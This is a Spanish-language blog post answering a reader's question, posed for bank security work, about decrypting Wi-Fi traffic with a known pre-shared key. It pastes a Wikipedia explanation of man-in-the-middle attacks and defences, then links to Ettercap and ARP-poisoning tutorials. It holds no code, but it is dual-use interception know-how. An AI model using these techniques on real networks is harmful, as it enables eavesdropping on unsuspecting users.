"Muchas gracias por colaboración, Ingeniero. Hay alguna bibliografía que me pueda recomendar para poder sustentar el argumento de que conociendo la PSK y utilizando un sniffer se pueden desencriptar los paquetes? El trabajo que estoy realizando es para un banco, y lo estamos haciendo bajo la óptica de "empleado descontento con acceso a la clave pre-compartida", de manera de poder justificar la obligatoriedad de un cambio de clave cada vez que salga un empleado de la nómina.
De nuevo, muchas gracias por su colaboración."

En criptografía, un ataque man-in-the-middle (MitM o intermediario, en castellano) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación.

La necesidad de una transferencia adicional por un canal seguro

Salvo el Interlock Protocol, todos los sistemas criptográficos seguros frente a ataques MitM requieren un intercambio adicional de datos o la transmisión de cierta información a través de algún tipo de canal seguro. En ese sentido, se han desarrollado muchos métodos de negociación de claves con diferentes exigencias de seguridad respecto al canal seguro.

Posibles subataques

El ataque MitM puede incluir algunos de los siguientes subataques:

* Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos.
* Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado.
* Ataques de sustitución.
* Ataques de repetición.
* Ataque por denegación de servicio (denial of service). El atacante podría, por ejemplo, bloquear las comunicaciones antes de atacar una de las partes. La defensa en ese caso pasa por el envío de periódico de mensajes de status autenticados.

MitM se emplea típicamente para referirse a manipulaciones activas de los mensajes, más que para denotar intercepción pasiva de la comunicación.

Un ejemplo de criptografía de clave pública

Supóngase que Alice desea comunicarse con Bob, y Mallory quiere interceptar esa conversación, o quizá hacer llegar un mensaje falso a Bob. Para inciar la comunicación, Alice debe solicitar a Bob su clave pública. Si Bob envía su clave a Alice, pero Mallory es capaz de interceptarla, ésta podría desplegar un ataque MitM. Mallory podría enviar a Alice su propia clave pública (de Mallory, en lugar de la de Bob). Alice, creyendo que la clave pública recibida es de Bob, cifraría su mensaje con la clave de Mallory y enviaría el criptograma a Bob. Mallory interceptaría de nuevo, descifraría el mensaje con su clave privada, guardaría una copia; volvería a cifrar el mensaje con la clave de Bob (tras una alteración, si así lo deseara) y lo re-enviaría a Bob. Cuando éste lo recibiera, creería que proviene de Alice.

Este ejemplo ilustra la necesidad de Alice y Bob de contar con alguna garantía de que están usando efectivamente las claves públicas correctas. En otro caso, sus comunicaciones se verían expuestas a ataques de este tipo usando la tecnología de clave pública. Afortunadamente, existe una variedad de técnicas que ayudan a defenderse de los ataques MitM.

Defensas contra el ataque

La posibilidad de un ataque de intermediario sigue siendo un problema potencial de seguridad serio, incluso para muchos criptosistemas basados en clave pública. Existen varios tipos de defensa contra estos ataques MitM que emplean técnicas de autenticación basadas en:

* Claves públicas
* Autenticación mutua fuerte
* Claves secretas (secretos con alta entropía)
* Passwords (secretos con baja entropía)
* Otros criterios, como el reconocimiento de voz u otras características biométricas

La integridad de las claves públicas debe asegurarse de alguna manera, pero éstas no exigen ser secretas, mientras que los passwords y las claves de secreto compartido tienen el requerimiento adicional de la confidencialidad. Las claves públicas pueden ser verificadas por una autoridad de certificación (CA), cuya clave pública sea distribuida a través de un canal seguro (por ejemplo, a través del explorador de Web o en la instalación del sistema operativo).

http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle

En el ataque anterior, se muestra cñaramente que una vez autenticado en la red se puede actar como intermediario entre dos elementos de la misma red sin que alguno de ellos se de cuenta y se puede obtener mucha información, es cuestion de analizar correctamente los paquetes que viajan y utilizar los mecanismos de desencriptación apropiados.

Un trabajo fácil cuando los paquetes viajan sin encriptación como en el caso de consultas http, MSNMS u otros; si se utilizan protocolos de comunicación más seguros, el trabajo del man in the middle es un poco más complicado, pero todo se puede.

http://www.securityfocus.com/brief/910
Man-in-the-middle attack sidesteps SSL

http://www.contentverification.com/man-in-the-middle/index.html
Man In The Middle Attack

http://en.wikipedia.org/wiki/Man-in-the-middle_attack
Man-in-the-middle attack

http://www.bujarra.com/ProcedimientoManInTheMiddle.html
Man In The Middle con Ettercap

http://icaix.com/front/2007/02/02/arp-poisoning-main-in-the-middle-attack-vol-1/
Videotutorial de tres partes de cómo hacer un MitM por ARP Poissoning.

Ahora que el man in the middle es uno de las formas de ataque, pero hay muchisimas formas de ataque una vez estando dentro de la misma red.

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)